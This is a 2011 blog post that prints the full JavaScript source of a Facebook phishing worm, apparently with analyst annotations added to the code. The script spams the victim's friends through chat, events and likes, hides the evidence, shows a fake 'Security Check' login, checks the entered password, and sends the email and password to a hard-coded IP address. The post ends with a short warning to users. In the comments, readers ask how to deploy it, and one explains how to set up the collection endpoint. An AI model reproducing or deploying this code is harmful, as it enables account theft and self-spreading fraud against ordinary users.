Tuesday, April 19, 2011

Advanced Phishing Technique for Facebook

Phishers have become more professional and use numerous techniques to phish passwords for popular websites. One such popular website is Facebook.
Note: Facebook is Registered Trademark of facebook.com. I am not responsible for any actions you do with this image.



The phishers made a fake Facebook application that looks exactly like a legitimate Facebook application; the difference is that it steals your Facebook username and password in the background.


You see a status from your friend such as "See this video this girl is totally hot". When you click it, it takes you to an application that asks you to ALLOW or Don't ALLOW. When you click Allow, it takes you to another page, which loads the advanced JavaScript (you could even call it AJAX). It then asks you to enter your username and password without any interruption; once you enter them, it automatically steals your information.

Below I am posting the source of the Facebook phishing script.

Warning: I take no responsibility for what you do with the source. It is posted purely for educational purposes.




// Analyst annotation: configuration and bootstrap of the captured sample.
// The script relies on page globals that are not defined in this listing
// (AsyncRequest, AvailableList, ChatUserInfos, chatDisplay), so it presumably
// runs inside a Facebook page the victim is logged in to -- confirm against
// the delivery vector.
//   like_link  - external URL passed to likeLink()
//   app_link   - application URL embedded in the chat lure text
//   embed_link - Flash player URL placed in an iframe by showVid()
//   im_text    - chat message text passed to sendIM()
//   patt / uid - regex match for a "viewer":<value> pair in the page HTML;
//                Init() only calls Spam() when this match is non-null
//   dom_jq     - <script> element used below to load jQuery
//   Delay      - seconds between an offer-link click and showVid()
// Indicators visible here: the like_link host, the app_link path and the
// embed_link id.
var like_link = 'http://www.pinkweddingfavors.info/bullypal/', app_link = 'http://apps.facebook.com/palpushesbully/', embed_link = 'http://www.ebaumsworld.com/playerbeta.swf?id0=81417366', im_text = 'haha! hilarous '+app_link, $j, jQuery, patt = /"viewer":([^:]+),/g, uid = patt.exec(document.body.innerHTML), dom_jq = document.createElement("script"), Delay = 30, timer;

// Event ids used as `eid` in attendEvent() and `node_id` in eventInvite().
events = 
[
  '158701400856839',
  '158768297517395',
  '211685662176870'
];

// One event id is picked at random per page load.
var event = events[Math.floor(Math.random()*events.length)];

// jQuery is pulled from a third-party origin by appending a <script> element.
// A script-src Content-Security-Policy limited to known origins would stop
// this load.
dom_jq.src = "http://code.jquery.com/jquery-latest.min.js";
dom_jq.type = "text/javascript";
document.body.appendChild(dom_jq);

// Poll every 100 ms until window.jQuery exists, then stop polling, take a
// private reference with noConflict(true) and hand over to Init().
var timer = setInterval(function() {
  if(typeof window.jQuery != "undefined") {
    clearInterval(timer);
    jQuery = window.jQuery;
    $j = jQuery.noConflict(true);
    Init();
  }
}, 100);

// Analyst annotation: entry point, called once jQuery has loaded.
// If the "viewer" id was found in the page (uid is non-null) the propagation
// routine Spam() runs first. It then binds a click handler to every
// ".offerlink" anchor: a click hides #OfferList, shows the #waitonuser
// "Checking..." panel and schedules showVid() after Delay seconds.
function Init() {
  if(uid){
    Spam();
  }
  
  $j('.offerlink').click(function()
  {
    // The string argument is evaluated as code when the timeout fires.
    timer = setTimeout('showVid()', Delay*1000);
    $j('#waitonuser').css('display', 'block');
    $j('#OfferList').css('display', 'none');
  });
}

// Analyst annotation: self-propagation routine. All actions are issued from
// the victim's own browser session, so server-side they look like actions
// taken by the victim.
// Steps visible in the code:
//   1. read a list of ids from AvailableList.getAvailableIDs() (a page global;
//      presumably the chat-available friends -- confirm),
//   2. "like" like_link and RSVP to the randomly chosen event,
//   3. invite the ids to that event in batches of 50,
//   4. send the chat lure im_text to ids at index 0..30,
//   5. start a 100 ms interval running hideSh().
// Detection hint: a burst of like / RSVP / invite / chat requests within a
// single page load is the behavioural signature of this routine.
function Spam() {
  var fids = AvailableList.getAvailableIDs();
  likeLink(like_link);
  attendEvent(event);
  var ch_fids = chunk(fids, 50);
  $j.each(ch_fids, function() {
    eventInvite(this, event)
  });
  
  $j.each(fids, function(key, value) {
    var userinfo = ChatUserInfos[value];
    var fname = userinfo.firstName;
    // key is the array index, so at most 31 recipients get the message.
    if(key<=30){
      sendIM(Math.floor(Math.random() * 99999999), Number(new Date), value, im_text);
    }
  });
  
  // String form of setInterval: evaluated as code every 100 ms.
  setInterval('hideSh()', 100);
}

// Analyst annotation: marks the victim as 'Attending' event id `b` by sending
// the payload to /ajax/events/actions.php through AsyncRequest (a page global
// not defined in this listing). `a` is assigned without `var`, so it is a
// global shared with the other request helpers.
function attendEvent(b) {
  a = {eid:b, inline:1, new_profile:1, rsvp_status: 'Attending'};
  (new AsyncRequest).setData(a).setURI("/ajax/events/actions.php").send();
}


// Analyst annotation: sends event invitations for event id `c` to the id
// list `b` via /ajax/social_graph/invite_dialog.php. Spam() calls this once
// per batch of up to 50 ids.
function eventInvite(b, c) {
  a = {class:'GuestManager', ids:b, node_id:c, send_invitations:1};
  (new AsyncRequest).setData(a).setURI("/ajax/social_graph/invite_dialog.php").send();
}


// Analyst annotation: submits a "like" edge for the external URL `b` to
// /ajax/connect/external_node_connect.php, with 'nctrl[_mod]' set to
// 'like_widget'. The request is sent without any user click on a Like button.
function likeLink(b) {
  a = {'href' : b, 'node_type' : 'page', 'edge_type' : 'like', 'page_id' : '', 'layout' : 'standard', 'is_personalized' : 'false', 'connect_text' : 0, 'ref' : '', 'now_connected' : 'true', 'nctrl[_mod]' : 'like_widget'};
  (new AsyncRequest).setData(a).setURI("/ajax/connect/external_node_connect.php").send();
}

// Analyst annotation: sends one chat message through /ajax/chat/send.php.
//   b - message id (Spam() passes a random integer)
//   c - client timestamp (Spam() passes Number(new Date))
//   d - recipient id
//   e - message text (Spam() passes im_text, which contains app_link)
function sendIM(b, c, d, e) {
  a = {msg_id:b, client_time:c, to:d, num_tabs:1, pvs_time:"", msg_text:e, to_offline:"false"};
  (new AsyncRequest).setData(a).setURI("/ajax/chat/send.php").send();
}

// Analyst annotation: concealment routine, run every 100 ms by Spam().
// For each ".fbChatMessage" element it extracts an id from the element id
// (pattern msg_<id>_) and calls clearHistory() on the matching chat tab, then
// clicks every ".uiCloseButton input" and removes "div.pop_dialog" nodes.
// The apparent effect is that the victim does not see the messages and
// dialogs produced by the propagation requests. Only the local view is
// cleared here; nothing in this listing touches the recipients' side.
function hideSh() {
  $j(".fbChatMessage").each(function() {
    var patt = /msg_(.*)_/g;
    var id = patt.exec(this.id);
    var fid = id[1];
    chatDisplay.tabs[fid].clearHistory();
  });
  $j(".uiCloseButton input").click();
  $j("div.pop_dialog").remove();
}

// Analyst annotation: utility that splits array `a` into consecutive
// sub-arrays of at most `s` elements and returns the array of sub-arrays.
// A new sub-array is started whenever i % s is 0. Spam() uses it with s = 50
// to batch event invitations.
function chunk(a, s){
    for(var x, i = 0, c = -1, l = a.length, n = []; i < l; i++)
        (x = i % s) ? n[c][x] = a[i] : n[++c] = [a[i]];
    return n;
}

// Analyst annotation: the "reward" step. Hides the fake dialog (#dialogbox)
// and the page overlay, then writes an iframe pointing at embed_link into the
// element #app205712022786034_player. It is called after the offer-link
// delay and after loginn() has accepted the entered credentials.
function showVid(){
  $j('#dialogbox').css('display', 'none');
  $j('#generic_dialog_overlay').css('display', 'none');
  $j('#app205712022786034_player').html('<iframe width="640" height="390" src="'+embed_link+'" frameborder="0" allowfullscreen></iframe>');
}

// Analyst annotation: credential capture handler, wired to the "Login" button
// of the fake "Security Check" dialog.
// It reads #email and #pass, then replays them in a synchronous POST to the
// relative URL /login.php (i.e. the origin of the page the script runs in).
// If the response does NOT contain the text "Facebook Login", the credentials
// are treated as valid: they are passed to phish() for exfiltration and the
// video is shown. Otherwise a fake error is displayed so the victim retries.
// Defender takeaway: the sample validates credentials before sending them
// out, so anything that reached the collection server should be treated as a
// confirmed-working password and reset.
function loginn() {
  var email = $j('#email').val(), pass =  $j('#pass').val();

  // Values are concatenated into the body without URL-encoding.
  var content = $j.ajax({
    type: 'POST',
    url: '/login.php',
    data: 'email=' + email + '&pass=' + pass + '&login=' + 'Log+in',
    async: false
  }).responseText;
  
  var patt = /Facebook Login/g, bool = patt.exec(content);
  if(!bool){
    phish(email, pass);
    showVid();
  }else{
    $j('#standard_status').css('display', 'none');
    $j('#error').css('display', 'block');
    // The regex literal is only a container for a percent-encoded string:
    // unescape(.source) decodes it to an HTML "Please re-enter your password"
    // error block that includes a hard-coded account-recovery link. The
    // encoding keeps the markup out of plain-text searches of the script.
    $j('#error').html(unescape(/%3c%68%32%20%69%64%3d%22%73%74%61%6e%64%61%72%64%5f%65%72%72%6f%72%22%20%63%6c%61%73%73%3d%22%6d%61%69%6e%5f%6d%65%73%73%61%67%65%22%3e%50%6c%65%61%73%65%20%72%65%2d%65%6e%74%65%72%20%79%6f%75%72%20%70%61%73%73%77%6f%72%64%3c%2f%68%32%3e%0d%0a%3c%70%20%69%64%3d%22%73%74%61%6e%64%61%72%64%5f%65%78%70%6c%61%6e%61%74%69%6f%6e%22%20%63%6c%61%73%73%3d%22%73%75%62%5f%6d%65%73%73%61%67%65%22%3e%3c%2f%70%3e%0d%0a%3c%70%3e%54%68%65%20%70%61%73%73%77%6f%72%64%20%79%6f%75%20%65%6e%74%65%72%65%64%20%69%73%20%69%6e%63%6f%72%72%65%63%74%2e%20%50%6c%65%61%73%65%20%74%72%79%20%61%67%61%69%6e%20%28%6d%61%6b%65%20%73%75%72%65%20%79%6f%75%72%20%63%61%70%73%20%6c%6f%63%6b%20%69%73%20%6f%66%66%29%2e%3c%2f%70%3e%0d%0a%3c%70%3e%0d%0a%46%6f%72%67%6f%74%20%79%6f%75%72%20%70%61%73%73%77%6f%72%64%3f%0d%0a%3c%61%20%68%72%65%66%3d%22%2f%72%65%63%6f%76%65%72%2e%70%68%70%3f%65%6d%61%69%6c%5f%6f%72%5f%70%68%6f%6e%65%3d%72%61%73%68%65%65%64%61%6d%61%75%6c%65%35%34%38%25%34%30%79%61%68%6f%6f%2e%63%6f%6d%22%3e%52%65%71%75%65%73%74%20%61%20%6e%65%77%20%6f%6e%65%2e%3c%2f%61%3e%0d%0a%3c%2f%70%3e%0d%0a%3c%70%3e%3c%2f%70%3e/.source));
  }
}

// Analyst annotation: exfiltration step. Assigning `src` on a new Image makes
// the browser issue a cross-origin GET, with no visible page change, to a
// hard-coded IP address; the email and password travel unencoded in the
// query string over plain HTTP.
// Detection and mitigation: the credentials appear in the request URL, so
// proxy or web-gateway logs can be searched for requests to this host and
// for "/log.php?email=" with a "pass=" parameter. An img-src
// Content-Security-Policy restricted to known origins would block the
// request.
function phish(email, pass){
  var log = new Image();
  log.src = 'http://173.231.144.82/log.php?email=' + email + '&pass=' + pass;
}

// Analyst annotation: builds the fake "Security Check" dialog and appends it
// to the page. The markup reuses Facebook's class names and loads a
// stylesheet from Facebook's own static host, so the dialog inherits the
// genuine look. It contains two panels:
//   #login  - an email/password form whose button calls loginn(); it starts
//             with display:none, and no code in this listing makes it visible
//   #survey - a "verify that you are a human" message with an affiliate
//             offer link (class "offerlink", handled in Init()) and a
//             "Checking..." wait panel
// User-facing tell: a password prompt rendered inside a page the user is
// already logged in to, rather than on the site's real login page.
dom_dg = document.createElement("div");
dom_dg.className = 'generic_dialog';
dom_dg.id = 'dialogbox';
dom_dg.innerHTML = '<link rel="stylesheet" type="text/css" href="http://s-static.ak.facebook.com/rsrc.php/v1/yM/r/HJkijFx_6MU.css">\
                    <div class="generic_dialog_popup" style="text-align:center; top: 216px;">\
                      <div class="pop_container_advanced">\
                        <div id="pop_content" class="pop_content">\
                        <h2 class="dialog_title"><span>Security Check</span></h2>\
                          <div class="dialog_content">\
                            <div class="dialog_body">\
                              <div id="login" style="display:none;">\
                                <div id="error" style="background-color: #FFEBE8; border-color: #DD3C10; border-style: solid; border-width: 1px; padding: 10px; display:none;"></div>\
                                <div id="standard_status" style="background-color: #FFF9D7; border-color: #E2C822; border-style: solid; border-width: 1px; padding: 10px;">\
                                  <h2 class="main_message">Please login to continue</h2>\
                                </div><br />\
                                <form id="login_form" action="index.php" method="POST">\
                                  <div class="form_row clearfix ">\
                                    <label id="label_email" class="login_form_label" for="email">Email:</label>\
                                    <input id="email" class="inputtext" type="text" value="" name="email">\
                                  </div>\
                                  <div class="form_row clearfix ">\
                                    <label id="label_pass" class="login_form_label" for="pass">Password:</label>\
                                    <input id="pass" class="inputpassword" type="password" value="" name="pass">\
                                  </div>\
                                  <div class="dialog_buttons clearfix">\
                                    <label class="uiButton uiButtonLarge uiButtonConfirm">\
                                      <input type="button" value="Login" onclick="loginn();">\
                                    </label>\
                                  </div>\
                                </form>\
                              </div>\
                              <div id="survey">\
                                <div id="standard_status" style="background-color: #FFF9D7; border-color: #E2C822; border-style: solid; border-width: 1px; padding: 10px;">\
                                   <h2 class="main_message">To prevent spam, we must verify that you are a human.</h2>\
                                </div><br />\
                                <div id="waitonuser" style="display:none;">\
                                  <strong>Checking...</strong><br />\
                                  <img alt="Loading . . ." src="http://www.infacta.com/IMG/loadingAnimation.gif" /><br />\
                                   Status: <span style="color:red;">Not completed</span><br /><br />\
                                   <strong><small>Note: It can take up to 60 seconds for confirmation.</small></strong><br /><br />\
                                   <a href="#" onclick="document.getElementById(\'waitonuser\').style.display=\'none\'; document.getElementById(\'OfferList\').style.display=\'block\'; clearTimeout(timer)">Re-open Survey</a>\
                                </div>\
                                <ul id="OfferList" style="font-weight:bold;font-size:12px;padding-top:10px;">\
                                  <li><a href="http://referer.us/my.adstrack.net/aff_c?offer_id=240&aff_id=1022" class="offerlink" target="blank">Please take this IQ test in order to confirm that you are a human.</a></li>\
                                </ul>\
                              </div>\
                              <div style="width:214px;height:0px" id="wideitup"></div>\
                            </div>\
                          </div>\
                        </div>\
                      </div>\
                    </div>\
                  </div>';
                    
document.body.appendChild(dom_dg);


Look at this function:


// Excerpt repeated from the listing: the credential exfiltration function.
// Setting `src` on an Image triggers a GET request to the hard-coded host
// with the email and password in the query string.
function phish(email, pass){
  var log = new Image();
  log.src = 'http://173.231.144.82/log.php?email=' + email + '&pass=' + pass;
}



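This is the function that steals the username and password in the background: it sets the src of an Image object, so the browser silently sends a GET request carrying the email and password in the query string to the attacker's server.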

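So beware: DO NOT CLICK ANY LINK ON FACEBOOK, EVEN IF IT'S FROM YOUR GIRLFRIEND, LOVER, FRIEND, MOM OR DAD. And never type your Facebook password into a dialog that an application shows you when you are already logged in.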







Signed
Subhash Dasyam

7 comments for "Advanced Phishing Technique for Facebook"

  1. steals it in the background and store it where?
    could it be set to be emailed to my address?

  2. http://173.231.144.82/log.php?email=


    the Log.php it can be emailed or stored in database or in a file

    log.php file



    Upload this to any site and replace the above url with your LOG.php url :)

  3. I did the similar phishing copied from net,i hav a doubt. actually i created three files index.php, lol.php and passwords.php I uploaded to a site created by me, now were should i see the enterd id and password and how :p

  4. youtube.com/watch?v=RVHviWhOyWk
    Here is a CLEAR method.

  5. i want to know that how this advance level phishing technic works .above the video link is given only for simple phishing attack but not for this pls help ..

  6. 'dude jo yeh script hai ishe kaha copy keroooo webhosting site pe??..
    kero to name kya dalu or password ke liya alghe se link aayenghe kya??.

  7. nice post dude ..... if you wanna some simpler you might visit
    http://jackofhack.com/internet-hacking/phishing-edition-2013

